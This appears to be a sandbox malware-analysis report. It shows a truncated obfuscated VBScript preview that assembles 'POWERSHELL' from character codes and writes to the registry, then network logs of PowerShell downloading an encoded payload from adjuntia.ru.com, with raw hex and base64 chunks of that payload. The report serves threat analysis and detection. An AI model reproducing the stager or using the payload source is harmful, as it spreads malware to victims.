                  File Content Preview:..Anisbolchers = "Royalized"....centers &H80000002, "S" + "OFTWARE\Classes\VBS" + "File"..........Dim Bulnedes..Bulnedes = DateAdd("s", 10, Now())..Do Until (Now() > Bulnedes)..Loop..Undertal= array(79+1,79,87,69,82,83,72,69,76,76)..Private Const Cenatory

                  File Icon

                  Icon Hash:68d69b8f86ab9a86

                  Network Behavior

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Aug 28, 2024 06:54:12.275382996 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:12.275423050 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:12.275552034 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:12.282361031 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:12.282377005 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:13.534145117 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:13.534209967 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:13.538768053 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:13.538779020 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:13.539160013 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:13.550270081 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:13.596507072 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:13.784667969 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:13.784699917 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:13.784780025 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:13.784806013 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:13.826975107 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:13.864394903 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:13.864403009 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:13.864500999 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:13.870671034 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:13.870678902 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:13.870853901 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:13.872401953 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:13.872464895 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:13.907794952 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:13.907865047 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:13.944391966 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:13.944499016 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:13.956990957 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:13.957099915 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:13.957948923 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:13.958017111 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:13.958942890 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:13.959011078 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:13.959477901 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:13.959531069 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:13.960453987 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:13.960504055 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:13.994431019 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:13.994520903 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.003010988 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.003098011 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.037599087 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.037662029 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.043596029 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.043662071 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.044320107 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.044389963 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.044528008 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.044591904 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.045346975 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.045416117 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.045501947 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.045577049 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.046319008 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.046376944 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.047146082 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.047198057 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.047384024 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.047442913 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.048106909 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.048163891 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.074840069 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.074918032 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.081115007 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.081185102 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.089723110 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.089778900 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.089998960 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.090058088 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.090420961 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.090491056 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.130224943 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.130307913 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.130356073 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.130407095 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.130793095 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.130856037 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.131009102 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.131064892 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.131393909 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.131448030 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.131628990 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.131685972 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.132114887 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.132178068 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.132431984 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.132464886 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.132486105 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.132503033 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.132539988 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.132563114 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.133163929 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.133229971 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.133311987 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.133372068 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.167637110 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.167715073 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.167920113 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.167977095 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.176597118 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.176661968 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.176863909 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.176913977 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.176970005 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.177028894 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.217004061 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.217139959 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.217223883 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.217281103 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.217550039 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.217605114 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.217812061 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.217869043 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.218106031 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.218158007 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.218391895 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.218435049 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.218530893 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.218589067 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.218765020 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.218831062 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.218991041 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.219065905 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.221885920 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.222039938 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.222096920 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.222110033 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.222135067 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.222143888 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.222269058 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.222331047 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.254756927 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.254853010 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.254861116 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.254874945 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.254918098 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.254919052 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.254926920 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.254956007 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.254990101 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.257807016 CEST49705443192.168.2.5185.221.216.115

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Aug 28, 2024 06:54:12.256294012 CEST6179253192.168.2.51.1.1.1
                  Aug 28, 2024 06:54:12.268279076 CEST53617921.1.1.1192.168.2.5

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Aug 28, 2024 06:54:12.256294012 CEST192.168.2.51.1.1.10xbd5fStandard query (0)adjuntia.ru.comA (IP address)IN (0x0001)false

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Aug 28, 2024 06:54:12.268279076 CEST1.1.1.1192.168.2.50xbd5fNo error (0)adjuntia.ru.com185.221.216.115A (IP address)IN (0x0001)false

                  HTTP Request Dependency Graph

                  • adjuntia.ru.com

                  HTTPS Proxied Packets

                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.549705185.221.216.1154431600C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  TimestampBytes transferredDirectionData
                  2024-08-28 04:54:13 UTC189OUTGET /wp-includes/img/Appliances.smi HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                  Host: adjuntia.ru.com
                  Connection: Keep-Alive
                  2024-08-28 04:54:13 UTC219INHTTP/1.1 200 OK
                  Date: Wed, 28 Aug 2024 04:54:13 GMT
                  Server: Apache
                  Last-Modified: Tue, 27 Aug 2024 23:40:52 GMT
                  Accept-Ranges: bytes
                  Content-Length: 464620
                  Connection: close
                  Content-Type: application/smil+xml
                  2024-08-28 04:54:13 UTC7973INData Raw: 63 51 47 62 63 51 47 62 75 36 50 4f 47 51 44 72 41 70 63 47 63 51 47 62 41 31 77 6b 42 4f 73 43 54 4e 52 78 41 5a 75 35 61 55 30 43 79 4f 73 43 6f 64 4a 78 41 5a 75 42 38 65 4c 57 50 36 42 78 41 5a 74 78 41 5a 75 42 77 58 56 6b 77 70 64 78 41 5a 76 72 41 6e 37 54 36 77 4b 4d 50 2b 73 43 36 30 36 36 48 69 4e 31 73 58 45 42 6d 2b 73 43 7a 74 31 78 41 5a 74 78 41 5a 73 78 79 6e 45 42 6d 2b 73 43 36 48 4f 4a 46 41 74 78 41 5a 74 78 41 5a 76 52 34 6e 45 42 6d 33 45 42 6d 34 50 42 42 4f 73 43 55 59 66 72 41 69 4d 5a 67 66 6b 64 39 4c 34 44 66 4d 33 72 41 74 63 7a 63 51 47 62 69 30 51 6b 42 48 45 42 6d 2b 73 43 74 4b 43 4a 77 33 45 42 6d 33 45 42 6d 34 48 44 4b 5a 6c 6f 41 2b 73 43 53 75 50 72 41 73 49 49 75 73 50 72 71 74 4e 78 41 5a 76 72 41 6f 6b 58 67 66 4b
                  Data Ascii: cQGbcQGbu6POGQDrApcGcQGbA1wkBOsCTNRxAZu5aU0CyOsCodJxAZuB8eLWP6BxAZtxAZuBwXVkwpdxAZvrAn7T6wKMP+sC6066HiN1sXEBm+sCzt1xAZtxAZsxynEBm+sC6HOJFAtxAZtxAZvR4nEBm3EBm4PBBOsCUYfrAiMZgfkd9L4DfM3rAtczcQGbi0QkBHEBm+sCtKCJw3EBm3EBm4HDKZloA+sCSuPrAsIIusPrqtNxAZvrAokXgfK
                  2024-08-28 04:54:13 UTC8000INData Raw: 76 6f 4c 56 46 49 2b 59 73 52 37 64 55 4d 33 32 2f 42 35 38 47 35 31 62 52 6d 52 59 6f 63 43 45 30 6f 44 50 72 70 64 57 55 59 77 6a 79 53 6d 78 45 79 52 58 56 58 4c 62 75 38 68 4b 4a 4a 6b 37 69 49 4d 76 68 48 54 30 51 49 44 76 75 77 79 2f 5a 32 4c 76 68 42 4e 74 5a 6e 47 61 4c 77 59 37 35 31 68 76 6a 68 6a 68 4a 6c 67 76 38 2b 32 4d 65 68 74 6f 6c 4d 70 4c 43 73 55 54 36 39 53 56 51 72 35 7a 6b 32 70 70 6e 72 56 45 6f 33 7a 52 66 67 7a 49 34 63 79 44 56 34 31 62 4a 42 68 73 57 79 62 59 46 59 48 4a 41 67 6d 70 74 71 4b 68 65 74 54 50 32 6b 6c 2b 59 35 2f 61 4a 57 67 64 33 47 39 76 69 46 38 62 5a 69 54 35 6c 49 75 43 65 6c 54 50 39 66 70 55 7a 2f 58 36 56 4d 2f 31 2b 6c 54 50 38 63 72 7a 50 41 46 6e 7a 6f 77 31 69 6a 58 50 39 66 70 55 7a 2f 58 36 56 4d 2f
                  Data Ascii: voLVFI+YsR7dUM32/B58G51bRmRYocCE0oDPrpdWUYwjySmxEyRXVXLbu8hKJJk7iIMvhHT0QIDvuwy/Z2LvhBNtZnGaLwY751hvjhjhJlgv8+2MehtolMpLCsUT69SVQr5zk2ppnrVEo3zRfgzI4cyDV41bJBhsWybYFYHJAgmptqKhetTP2kl+Y5/aJWgd3G9viF8bZiT5lIuCelTP9fpUz/X6VM/1+lTP8crzPAFnzow1ijXP9fpUz/X6VM/
                  2024-08-28 04:54:13 UTC8000INData Raw: 4a 5a 58 50 78 74 67 5a 36 57 73 5a 47 51 73 46 4e 6c 41 52 39 73 64 54 71 46 51 70 2b 55 75 43 79 74 59 4b 6e 79 69 72 32 78 73 33 51 74 4f 55 57 69 67 31 72 48 54 42 72 34 55 41 4f 69 4b 2b 32 42 59 34 76 50 46 78 49 32 54 6c 55 43 44 6d 4e 35 6d 34 6e 6a 2b 57 43 6a 48 43 67 62 64 5a 2b 75 36 5a 49 56 54 71 75 55 6d 6c 39 4c 4e 66 6d 68 61 69 56 59 62 4f 4b 65 74 4d 74 4c 56 66 30 70 6e 4b 31 59 44 77 43 47 5a 46 67 57 6a 58 67 39 61 4b 55 71 50 31 75 79 73 77 67 75 73 58 66 39 4e 56 46 4c 33 33 77 37 43 30 65 72 42 63 68 53 71 42 5a 32 36 49 39 77 57 37 4f 35 2b 30 44 79 57 38 47 31 47 44 44 69 30 73 61 36 6e 36 61 4e 6f 36 4b 43 77 65 30 52 53 4f 51 32 37 4d 62 4d 42 68 62 44 51 47 4d 68 57 47 78 72 6d 41 4e 66 53 2f 56 65 5a 4d 41 6c 65 36 2b 4c 33
                  Data Ascii: JZXPxtgZ6WsZGQsFNlAR9sdTqFQp+UuCytYKnyir2xs3QtOUWig1rHTBr4UAOiK+2BY4vPFxI2TlUCDmN5m4nj+WCjHCgbdZ+u6ZIVTquUml9LNfmhaiVYbOKetMtLVf0pnK1YDwCGZFgWjXg9aKUqP1uyswgusXf9NVFL33w7C0erBchSqBZ26I9wW7O5+0DyW8G1GDDi0sa6n6aNo6KCwe0RSOQ27MbMBhbDQGMhWGxrmANfS/VeZMAle6+L3
                  2024-08-28 04:54:13 UTC8000INData Raw: 73 73 79 64 2f 4e 5a 6a 64 74 5a 68 2b 71 65 6c 5a 63 39 44 6c 32 77 4b 6b 39 76 30 59 4a 6b 55 69 45 4a 4d 4e 62 32 67 54 2f 58 36 56 4d 2f 31 2b 6c 54 50 39 66 70 55 7a 2f 58 36 58 50 31 64 49 46 5a 43 72 4a 41 4f 2f 58 69 4a 57 46 50 2b 7a 55 53 34 6f 4d 47 6d 2f 31 4e 76 2b 30 59 72 49 46 6a 76 68 48 61 78 7a 41 79 61 4c 31 4a 39 70 35 47 74 74 47 79 65 43 75 37 7a 63 63 35 4f 50 36 78 61 7a 43 72 37 63 62 75 5a 45 59 4d 70 41 64 58 79 49 56 37 43 53 5a 63 46 77 32 45 45 7a 71 6f 57 31 59 43 69 61 2b 66 71 39 4c 38 39 4f 6d 4d 7a 46 59 43 58 33 78 46 2f 77 57 42 69 51 74 45 44 56 59 66 6f 56 34 53 73 4e 4c 4a 64 6f 70 52 75 46 59 66 65 57 4e 4e 58 64 4c 4a 38 46 51 5a 5a 34 64 31 32 74 2f 65 32 63 34 48 44 35 42 43 59 45 65 30 39 6f 35 45 6a 41 2b 4c
                  Data Ascii: ssyd/NZjdtZh+qelZc9Dl2wKk9v0YJkUiEJMNb2gT/X6VM/1+lTP9fpUz/X6XP1dIFZCrJAO/XiJWFP+zUS4oMGm/1Nv+0YrIFjvhHaxzAyaL1J9p5GttGyeCu7zcc5OP6xazCr7cbuZEYMpAdXyIV7CSZcFw2EEzqoW1YCia+fq9L89OmMzFYCX3xF/wWBiQtEDVYfoV4SsNLJdopRuFYfeWNNXdLJ8FQZZ4d12t/e2c4HD5BCYEe09o5EjA+L
                  2024-08-28 04:54:13 UTC8000INData Raw: 71 72 53 79 59 79 6c 50 41 4f 46 64 64 72 64 33 74 76 4f 42 67 6d 53 64 35 49 38 69 6d 46 38 52 4e 55 42 65 65 62 39 74 68 4c 6c 7a 62 63 31 39 56 4e 37 5a 48 41 33 30 4c 46 68 6f 50 2f 5a 38 6a 45 62 30 34 5a 4d 6c 6c 7a 41 6a 39 62 2b 6a 52 36 51 54 7a 4c 4d 55 32 47 47 59 74 36 51 31 75 6c 54 76 68 41 57 55 7a 2f 58 59 4d 35 45 31 65 6c 54 62 47 78 71 70 70 68 74 61 4b 42 53 4a 71 4a 76 76 6a 77 4d 51 54 4a 72 61 4b 41 32 4a 44 65 5a 62 55 74 67 73 54 37 4e 64 47 76 2f 72 66 66 6f 4e 55 56 52 78 56 59 74 36 47 61 51 58 4a 4b 61 47 45 4e 2b 42 78 4e 37 71 2b 72 43 45 42 44 65 64 65 51 68 64 63 63 68 47 45 45 76 41 6b 63 31 6c 6b 4a 50 43 51 59 66 73 74 72 45 68 47 4c 4f 52 4e 58 70 55 39 66 54 68 56 63 2f 69 65 5a 54 4b 2f 50 70 55 7a 2f 58 36 56 4d 2f
                  Data Ascii: qrSyYylPAOFddrd3tvOBgmSd5I8imF8RNUBeeb9thLlzbc19VN7ZHA30LFhoP/Z8jEb04ZMllzAj9b+jR6QTzLMU2GGYt6Q1ulTvhAWUz/XYM5E1elTbGxqpphtaKBSJqJvvjwMQTJraKA2JDeZbUtgsT7NdGv/rffoNUVRxVYt6GaQXJKaGEN+BxN7q+rCEBDedeQhdcchGEEvAkc1lkJPCQYfstrEhGLORNXpU9fThVc/ieZTK/PpUz/X6VM/
                  2024-08-28 04:54:13 UTC8000INData Raw: 6e 51 39 50 64 66 70 36 46 31 2b 75 6b 61 36 48 47 69 34 54 31 43 78 52 4c 73 63 61 4b 43 39 43 76 50 62 76 69 53 56 52 39 32 69 6a 32 72 2b 73 64 43 59 62 46 78 30 50 54 33 58 36 54 58 49 45 4a 4a 33 74 6b 4a 49 55 6a 2f 58 59 4b 6c 74 49 43 6a 74 31 39 48 67 32 4b 70 32 36 46 4d 2f 55 78 53 37 50 74 58 6f 55 31 6c 57 46 72 46 58 37 6a 6a 61 69 68 6a 6f 55 7a 39 65 46 77 57 30 59 69 5a 53 50 39 66 52 72 56 6e 75 4d 4e 50 43 6d 6d 71 55 4f 31 35 63 38 6a 37 58 36 64 72 42 55 69 41 46 77 31 78 63 38 6a 37 58 36 64 44 34 30 32 67 75 51 31 32 7a 55 7a 2f 59 5a 41 34 50 31 2b 6e 61 73 71 76 6f 55 7a 39 65 45 4b 54 39 47 56 6c 52 55 34 62 52 67 72 52 61 6c 56 49 2f 31 32 79 4b 56 32 6e 37 54 59 70 58 46 72 61 58 5a 32 68 6e 47 79 67 57 6f 71 31 57 78 58 66 79
                  Data Ascii: nQ9Pdfp6F1+uka6HGi4T1CxRLscaKC9CvPbviSVR92ij2r+sdCYbFx0PT3X6TXIEJJ3tkJIUj/XYKltICjt19Hg2Kp26FM/UxS7PtXoU1lWFrFX7jjaihjoUz9eFwW0YiZSP9fRrVnuMNPCmmqUO15c8j7X6drBUiAFw1xc8j7X6dD402guQ12zUz/YZA4P1+nasqvoUz9eEKT9GVlRU4bRgrRalVI/12yKV2n7TYpXFraXZ2hnGygWoq1WxXfy
                  2024-08-28 04:54:13 UTC8000INData Raw: 57 69 53 2f 31 47 42 44 37 62 65 64 6d 4c 5a 36 4f 4f 39 34 57 4f 75 42 38 70 72 4b 4f 45 77 69 68 52 47 6b 79 5a 62 56 76 37 64 75 6f 73 4b 38 35 30 4b 62 32 2b 65 77 58 52 69 33 42 46 32 77 38 42 6d 77 59 66 78 6b 42 4a 39 59 4d 2f 49 30 76 73 53 61 6b 39 67 53 7a 74 6a 55 6b 66 58 65 63 4b 53 41 47 75 69 71 54 58 4a 45 38 2b 48 77 34 42 38 2b 64 6f 43 2f 78 56 67 45 76 78 6e 76 35 5a 74 6e 67 47 2b 37 45 54 46 78 53 2b 2b 49 4c 62 4a 51 45 35 6f 70 4c 6d 55 61 75 6d 2b 49 47 54 53 44 2f 5a 6f 76 47 46 62 4e 69 32 32 79 48 2b 51 64 4b 6b 4c 49 44 46 77 2f 51 75 77 61 2f 68 35 43 78 33 4e 66 69 67 70 45 4a 49 47 5a 4e 42 45 45 74 6c 58 6e 47 34 2b 6d 35 47 59 30 45 4d 4d 76 75 50 4e 2b 2f 43 62 64 67 57 42 4d 63 38 34 2b 56 59 66 74 61 4f 64 54 74 4c 4a
                  Data Ascii: WiS/1GBD7bedmLZ6OO94WOuB8prKOEwihRGkyZbVv7duosK850Kb2+ewXRi3BF2w8BmwYfxkBJ9YM/I0vsSak9gSztjUkfXecKSAGuiqTXJE8+Hw4B8+doC/xVgEvxnv5ZtngG+7ETFxS++ILbJQE5opLmUaum+IGTSD/ZovGFbNi22yH+QdKkLIDFw/Quwa/h5Cx3NfigpEJIGZNBEEtlXnG4+m5GY0EMMvuPN+/CbdgWBMc84+VYftaOdTtLJ
                  2024-08-28 04:54:13 UTC8000INData Raw: 77 64 56 33 67 43 78 35 35 31 76 6a 77 79 30 2b 2b 49 65 2f 68 47 44 2b 48 51 79 45 65 6d 42 5a 62 77 58 73 31 4c 79 6b 63 65 49 30 5a 68 6d 50 2b 71 73 50 64 65 44 55 39 66 68 37 6c 63 2f 57 4b 77 37 61 57 6e 47 6c 59 46 6b 61 4b 56 53 36 61 6e 5a 76 6a 6d 72 70 4d 48 75 75 38 2b 32 4e 65 42 68 6f 72 46 73 69 45 62 4b 65 73 30 36 4f 5a 4c 76 39 69 7a 5a 39 62 2f 77 46 63 52 34 67 69 74 36 2b 66 67 6b 67 30 4d 36 4e 71 4c 49 45 42 4b 31 63 76 4b 62 31 2b 61 4e 62 5a 4e 68 56 4a 51 76 50 39 68 74 33 6a 37 58 36 64 42 43 6f 2b 68 63 75 71 6e 6f 55 7a 38 6f 58 4d 63 2f 31 2b 6d 66 76 36 2b 78 51 38 2b 34 32 66 6f 75 47 39 63 50 52 6c 67 5a 44 31 35 47 78 6d 4a 57 6f 38 5a 6e 4a 64 53 55 69 45 59 47 69 51 75 5a 7a 4b 45 52 77 4b 4b 42 42 49 42 4d 69 74 6e 33
                  Data Ascii: wdV3gCx551vjwy0++Ie/hGD+HQyEemBZbwXs1LykceI0ZhmP+qsPdeDU9fh7lc/WKw7aWnGlYFkaKVS6anZvjmrpMHuu8+2NeBhorFsiEbKes06OZLv9izZ9b/wFcR4git6+fgkg0M6NqLIEBK1cvKb1+aNbZNhVJQvP9ht3j7X6dBCo+hcuqnoUz8oXMc/1+mfv6+xQ8+42fouG9cPRlgZD15GxmJWo8ZnJdSUiEYGiQuZzKERwKKBBIBMitn3
                  2024-08-28 04:54:13 UTC8000INData Raw: 69 72 67 30 51 64 44 63 39 79 5a 61 4b 51 42 33 6f 34 66 4d 42 44 52 6f 6a 2f 58 36 56 4d 2f 31 2b 6c 54 50 39 66 70 55 7a 2f 58 36 58 66 38 70 30 33 2b 4a 36 56 73 33 57 77 61 49 51 6f 55 4c 74 41 31 73 30 6f 33 41 46 37 65 38 6d 73 4b 61 65 5a 54 4c 4b 54 70 55 7a 2f 58 36 56 4d 2f 31 2b 6c 54 50 39 66 70 55 7a 2f 78 6c 6d 41 69 32 55 4d 47 78 6a 67 4e 6c 57 42 54 4a 4e 33 6c 6b 35 4b 65 4a 71 69 5a 4c 38 47 5a 76 6c 77 2b 78 6d 35 54 50 39 66 70 55 7a 2f 58 36 56 4d 2f 31 2b 6c 54 50 39 66 2f 56 51 48 76 6a 43 4d 78 71 66 76 59 67 6b 6a 6f 55 7a 38 62 64 6e 57 4e 36 55 58 4c 41 74 2b 31 66 76 55 37 78 78 36 55 79 56 41 6f 48 4c 79 62 31 79 59 64 63 41 51 2f 56 44 30 51 75 54 72 4e 75 71 48 6d 54 65 2f 34 70 4c 72 6f 35 35 55 6d 6d 62 34 6b 50 62 62 5a
                  Data Ascii: irg0QdDc9yZaKQB3o4fMBDRoj/X6VM/1+lTP9fpUz/X6Xf8p03+J6Vs3WwaIQoULtA1s0o3AF7e8msKaeZTLKTpUz/X6VM/1+lTP9fpUz/xlmAi2UMGxjgNlWBTJN3lk5KeJqiZL8GZvlw+xm5TP9fpUz/X6VM/1+lTP9f/VQHvjCMxqfvYgkjoUz8bdnWN6UXLAt+1fvU7xx6UyVAoHLyb1yYdcAQ/VD0QuTrNuqHmTe/4pLro55Ummb4kPbbZ
